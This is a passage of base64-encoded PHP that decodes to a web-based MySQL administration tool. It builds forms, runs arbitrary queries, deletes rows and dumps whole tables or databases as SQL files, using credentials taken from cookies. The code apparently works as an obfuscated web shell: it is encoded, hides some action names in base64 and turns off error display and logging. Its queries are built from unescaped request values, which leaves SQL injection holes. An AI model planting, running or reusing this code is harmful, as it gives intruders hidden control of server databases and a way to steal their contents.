GlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rp